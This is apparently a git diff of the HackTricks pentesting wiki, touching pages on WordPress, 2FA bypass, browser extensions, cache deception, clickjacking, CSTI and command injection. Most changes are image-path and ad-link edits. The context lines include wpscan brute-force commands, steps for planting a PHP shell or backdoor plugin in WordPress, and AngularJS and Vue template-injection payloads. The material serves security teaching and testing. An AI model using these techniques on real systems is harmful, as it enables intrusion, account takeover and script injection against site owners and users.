 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md
index 0e3cf74a1..7fcb30475 100644
--- a/network-services-pentesting/pentesting-web/wordpress.md
+++ b/network-services-pentesting/pentesting-web/wordpress.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
 
 ## Basic Information
 
@@ -76,15 +76,15 @@ curl https://victim.com/ | grep 'content="WordPress'
 
 * `meta name`
 
-![](<../../.gitbook/assets/image (1108).png>)
+![](<../../.gitbook/assets/image (1111).png>)
 
 * CSS link files
 
-![](<../../.gitbook/assets/image (530).png>)
+![](<../../.gitbook/assets/image (533).png>)
 
 * JavaScript files
 
-![](<../../.gitbook/assets/image (521).png>)
+![](<../../.gitbook/assets/image (524).png>)
 
 ### Get Plugins
 
@@ -111,13 +111,13 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
 ```
 {% endcode %}
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
 
 ## Active enumeration
 
@@ -194,7 +194,7 @@ The message _"Incorrect username or password"_ inside a 200 code response should
 
 ![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
 
-![](<../../.gitbook/assets/image (718).png>)
+![](<../../.gitbook/assets/image (721).png>)
 
 Using the correct credentials you can upload a file. In the response the path will appears ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
 
@@ -230,7 +230,7 @@ Using the correct credentials you can upload a file. In the response the path wi
 
 Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
 
-<figure><img src="../../.gitbook/assets/image (625).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (628).png" alt=""><figcaption></figcaption></figure>
 
 **Bypass 2FA**
 
@@ -269,7 +269,7 @@ Take a look to the use of **`system.multicall`** in the previous section to lear
 </methodCall>
 ```
 
-![](<../../.gitbook/assets/image (107).png>)
+![](<../../.gitbook/assets/image (110).png>)
 
 ### wp-cron.php DoS
 
@@ -285,7 +285,7 @@ Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa
 
 This is the response when it doesn't work:
 
-![](<../../.gitbook/assets/image (362).png>)
+![](<../../.gitbook/assets/image (365).png>)
 
 ### SSRF
 
@@ -301,13 +301,13 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
 #You can try to bruteforce the admin user using wpscan with "-U admin"
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
 
 ## Get access by overwriting a bit
 
@@ -326,7 +326,7 @@ Appearance → Theme Editor → 404 Template (at the right)
 
 Change the content for a php shell:
 
-![](<../../.gitbook/assets/image (381).png>)
+![](<../../.gitbook/assets/image (384).png>)
 
 Search in internet how can you access that updated page. In this case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
@@ -347,27 +347,27 @@ to get a session.
 It may be possible to upload .php files as a plugin.\
 Create your php backdoor using for example:
 
-![](<../../.gitbook/assets/image (180).png>)
+![](<../../.gitbook/assets/image (183).png>)
 
 Then add a new plugin:
 
-![](<../../.gitbook/assets/image (719).png>)
+![](<../../.gitbook/assets/image (722).png>)
 
 Upload plugin and press Install Now:
 
-![](<../../.gitbook/assets/image (246).png>)
+![](<../../.gitbook/assets/image (249).png>)
 
 Click on Procced:
 
-![](<../../.gitbook/assets/image (67).png>)
+![](<../../.gitbook/assets/image (70).png>)
 
 Probably this won't do anything apparently, but if you go to Media, you will see your shell uploaded:
 
-![](<../../.gitbook/assets/image (459).png>)
+![](<../../.gitbook/assets/image (462).png>)
 
 Access it and you will see the URL to execute the reverse shell:
 
-![](<../../.gitbook/assets/image (1003).png>)
+![](<../../.gitbook/assets/image (1006).png>)
 
 ### Uploading and activating malicious plugin
 
@@ -429,13 +429,13 @@ Also, **only install trustable WordPress plugins and themes**.
 * **Limit login attempts** to prevent Brute Force attacks
 * Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
 
 <details>
 
diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md
index a0a18e88a..a49dcbc70 100644
--- a/pentesting-web/2fa-bypass.md
+++ b/pentesting-web/2fa-bypass.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## **Enhanced Two-Factor Authentication Bypass Techniques**
 
@@ -145,10 +145,9 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit
 * [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
 * [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -157,7 +156,9 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
 You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
+
 P
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/pentesting-web/browser-extension-pentesting-methodology/README.md b/pentesting-web/browser-extension-pentesting-methodology/README.md
index 1d01f8ab1..1e89f4d80 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -22,7 +22,7 @@ Browser extensions are written in JavaScript and loaded by the browser in the ba
 
 Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
 
-<figure><img src="../../.gitbook/assets/image (13).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
 
 ### **Content Scripts**
 
@@ -119,7 +119,7 @@ chrome.storage.local.get("message", result =>
 });
 ```
 
-<figure><img src="../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (23).png" alt=""><figcaption></figcaption></figure>
 
 A message is sent to the extension pages by the content script when this button is clicked, through the utilization of the [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage). This is due to the content script's limitation in direct access to APIs, with `storage` being among the few exceptions. For functionalities beyond these exceptions, messages are sent to extension pages which content scripts can communicate with.
 
@@ -288,7 +288,7 @@ Browser extensions can contain various kinds of pages:
 * Pages that the extension will **load in a new tab**.
 * **Option Pages**: This page displays on top of the extension when clicked. In the previous manifest In my case I was able to access this page in `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` or clicking:
 
-<figure><img src="../../.gitbook/assets/image (21).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (24).png" alt="" width="375"><figcaption></figcaption></figure>
 
 Note that these pages aren't persistent like background pages as they load dynamically content on necessity. Despite this, they share certain capabilities with the background page:
 
@@ -353,7 +353,7 @@ chrome-extension://<extension-id>/message.html
 
 In public extensions the **extension-id is accesible**:
 
-<figure><img src="../../.gitbook/assets/image (1191).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1194).png" alt="" width="375"><figcaption></figcaption></figure>
 
 Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this **id can be dynamic**.
 
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index 2cefe7ec9..7b0b8a77e 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -97,7 +97,7 @@ button {
 
 A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example):
 
-<figure><img src="../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
 
 **Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
 
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 850078d5e..2b15cfaf6 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -24,7 +24,7 @@ The previous manifest declares that the extension requires the `storage` permiss
 
 An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:
 
-<figure><img src="../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
 
 You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.**
 
diff --git a/pentesting-web/cache-deception/README.md b/pentesting-web/cache-deception/README.md
index 3ed128d6e..2a370d1d3 100644
--- a/pentesting-web/cache-deception/README.md
+++ b/pentesting-web/cache-deception/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
 ## The difference
 
@@ -169,13 +169,13 @@ Example usage: `wcvs -u example.com`
 
 
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
 
 
@@ -253,13 +253,13 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
 * [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
 * [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
 <details>
 
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index f77bd6244..4631b8115 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
 
 ## What is Clickjacking
 
@@ -218,13 +218,13 @@ if (top !== self) {
 * [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
 * [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
 
 <details>
 
diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md
index 449478738..ee25d3176 100644
--- a/pentesting-web/client-side-template-injection-csti.md
+++ b/pentesting-web/client-side-template-injection-csti.md
@@ -1,4 +1,4 @@
-
+# Client Side Template Injection (CSTI)
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,17 +26,17 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-# Summary
+## Summary
 
 It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
 
 **Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a template** and will execute it. For example, with a payload like `{{ 7-7 }}`, if the app is **vulnerable** you will see a `0`, and if not, you will see the original: `{{ 7-7 }}`
 
-# AngularJS
+## AngularJS
 
-AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces. 
+AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.
 
 In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:
 
@@ -49,13 +49,13 @@ In scenarios where user input is dynamically inserted into the HTML body tagged
 <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
 ```
 
-You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**
+You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
 
 {% hint style="danger" %}
-[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
+[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
 {% endhint %}
 
-# VueJS
+## VueJS
 
 You can find a **vulnerable Vue** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
 Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
@@ -69,7 +69,7 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
 
 A really good post on CSTI in VUE can be found in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
 
-## **V3**
+### **V3**
 
 ```
 {{_openBlock.constructor('alert(1)')()}}
@@ -77,7 +77,7 @@ A really good post on CSTI in VUE can be found in [https://portswigger.net/resea
 
 Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
 
-## **V2**
+### **V2**
 
 ```
 {{constructor.constructor('alert(1)')()}}
@@ -87,7 +87,7 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
 
 **Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
 
-# Mavo
+## Mavo
 
 Payload:
 
@@ -107,13 +107,13 @@ javascript:alert(1)%252f%252f..%252fcss-images
 
 **More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
 
-# **Brute-Force Detection List**
+## **Brute-Force Detection List**
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -132,9 +132,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md
index 524574672..62b055557 100644
--- a/pentesting-web/command-injection.md
+++ b/pentesting-web/command-injection.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
 
 ## What is command Injection?
 
@@ -171,10 +171,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
